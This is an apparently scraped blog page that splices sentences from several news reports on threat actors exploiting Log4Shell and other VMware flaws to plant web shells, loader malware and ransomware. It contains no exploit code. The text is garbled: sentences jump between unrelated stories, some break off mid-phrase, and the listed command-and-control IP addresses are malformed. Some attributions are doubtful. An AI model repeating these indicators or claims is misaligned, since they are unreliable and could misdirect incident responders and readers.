The alert includes Incident Response and Mitigations about the ongoing attacks. The researchers observed a distinct threat actor exploiting the CVE-2022-22954 in VMware Workspace ONE Access and Identity Manager to deliver the Dingo J-spy web shell. In a distinct attack, APT actors used PowerShell scripts in the production environment to facilitate lateral movement and implant loader malware that allows remotely monitoring a system’s desktop, gaining reverse shell access, exfiltrating data, and uploading and executing next-stage binaries. The activity started from IP address 104.155.149103, which appears to be part of the actors’ C2 infrastructure. In the same period, CISA observed the actors attempt to download and execute a malicious file from 109.248.15013. In an attack that took place at the end of January, threat actors exploited the Log4Shell in an unpatched VMware Horizon server, then used PowerShell scripts to connect a remote server (109.248.15013) via Hypertext Transfer Protocol (HTTP) to retrieve additional PowerShell scripts. “The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network.” reads the joint alert. vulnerability affects VMware Horizon and Unified Access Gateway servers. In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.īased on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed “hmsvc.exe” that’s equipped with capabilities to log keystrokes and deploy additional malware. Hackers Still Exploiting Log4Shell Flaw in Unpatched VMware Servers, Feds Warn. The security team at the UK National Health Service (NHS) announced to have spotted threat actors exploiting the Log4Shell vulnerability to hack VMWare Horizon servers and install web shells. On Monday, Microsoft published a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the. This alert includes information about APT actors’ tactics, techniques, and procedures (TTPs), along with indicators of compromise related to the loader malware. A threat actor attempted to exploit the Log4Shell vulnerability to hack VMWare Horizon servers at UK NHS and deploy web shells. In one attack documented by the government experts, threat actors were able to move laterally inside the network and collect and exfiltrate sensitive data. 'These attack campaigns appear to exploit CVE-2021-21974, for which a patch has been available since February 23, 2021,' the Computer Emergency Response Team (CERT) of France said in an advisory on Friday. The CVE-2021-44228 flaw made the headlines in December, after Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for the critical remote code execution zero-day vulnerability ( aka Log4Shell) that affects the Apache Log4j Java-based logging library. VMware ESXi hypervisors are the target of a new wave of attacks designed to deploy ransomware on compromised systems.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |